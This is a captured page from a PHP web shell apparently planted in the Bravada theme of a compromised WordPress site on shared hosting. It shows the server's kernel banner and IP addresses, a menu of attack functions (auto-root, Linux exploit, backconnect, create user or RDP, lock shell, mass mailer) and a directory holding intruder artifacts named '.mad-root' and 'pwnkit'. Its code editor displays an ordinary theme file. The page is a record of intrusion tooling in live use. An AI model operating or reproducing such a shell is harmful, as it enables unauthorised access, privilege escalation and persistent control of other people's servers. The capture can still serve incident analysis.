Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.101
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
bravada /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
content
[ DIR ]
drwxr-xr-x
cryout
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
896
B
-rw-r--r--
archive.php
2.03
KB
-rw-r--r--
comments.php
1.45
KB
-rw-r--r--
footer.php
1009
B
-rw-r--r--
front-page.php
950
B
-rw-r--r--
functions.php
1.66
KB
-rw-r--r--
header.php
2.83
KB
-rw-r--r--
image.php
2.85
KB
-rw-r--r--
index.php
1.07
KB
-rw-r--r--
loco.xml
893
B
-rw-r--r--
page.php
658
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
16.47
KB
-rw-r--r--
screenshot.png
1.2
MB
-rw-r--r--
search.php
1.26
KB
-rw-r--r--
searchform.php
629
B
-rw-r--r--
sidebar-footer.php
475
B
-rw-r--r--
sidebar-left.php
1.21
KB
-rw-r--r--
sidebar-right.php
1.13
KB
-rw-r--r--
single.php
3.52
KB
-rw-r--r--
style.css
205.37
KB
-rw-r--r--
woocommerce.php
805
B
-rw-r--r--
wpml-config.xml
903
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : image.php
<?php /** * The template for displaying attachments. * * @package Bravada */ get_header(); ?> <div id="container" class="single-attachment <?php bravada_get_layout_class(); ?>"> <main id="main" class="main"> <?php while ( have_posts() ) : the_post(); ?> <article id="post-<?php the_ID(); ?>" <?php post_class( 'post' ); ?>> <div class="article-inner"> <header> <?php cryout_post_title_hook(); ?> <?php the_title( '<h1 class="entry-title" ' . cryout_schema_microdata( 'entry-title', 0 ) . '>', '</h1>' ); ?> <div class="entry-meta"> <?php cryout_post_meta_hook(); // Retrieve attachment metadata. $metadata = wp_get_attachment_metadata(); if ( $metadata ) { printf( '<span class="full-size-link"><span class="screen-reader-text">%1$s </span><i class="icon-image icon-metas" title="%1$s"></i> <a href="%2$s">%3$s × %4$s </a>%5$s</span>', esc_html_x( 'Full size', 'Used before full size attachment link.', 'bravada' ), esc_url( wp_get_attachment_url() ), absint( $metadata['width'] ), absint( $metadata['height'] ), __( 'pixels', 'bravada' ) ); } // Retrieve attachment parent post. if ( ! empty( $post->post_parent ) ) : ?> <span class="published-in"> <i class="icon-book icon-metas" title="<?php esc_attr_e( 'Published in', 'bravada' ); ?>"></i> <a href="<?php echo esc_url( get_permalink( $post->post_parent ) ) ?>"> <?php echo esc_html( get_the_title( $post->post_parent ) );?> </a> </span> <?php endif; ?> </div><!-- .entry-meta --> </header> <div class="entry-content" <?php cryout_schema_microdata( 'entry-content' ); ?>> <div class="entry-attachment"> <?php // actual attachment $image_size = apply_filters( 'bravada_attachment_size', 'large' ); echo wp_get_attachment_image( get_the_ID(), $image_size ) . '<br>'; // attachment caption the_excerpt(); ?> </div><!-- .entry-attachment --> <?php the_content(); ?> </div><!-- .entry-content --> <div id="nav-below" class="navigation image-navigation"> <div class="nav-previous"><?php previous_image_link( false, '<i class="icon-angle-left"></i>' . __( "Previous image", "bravada" ) ); ?></div> <div class="nav-next"><?php next_image_link( false, __("Next image", "bravada") . '<i class="icon-angle-right"></i>' ); ?></div> </div><!-- #nav-below --> <footer class="entry-meta entry-utility"> <?php cryout_post_utility_hook(); ?> </footer><!-- .entry-meta --> <?php comments_template( '', true ); ?> </div><!-- .article-inner --> </article><!-- #post-## --> <?php endwhile; ?> </main><!-- #main --> <?php bravada_get_sidebar(); ?> </div><!-- #container --> <?php get_footer(); ?>
Close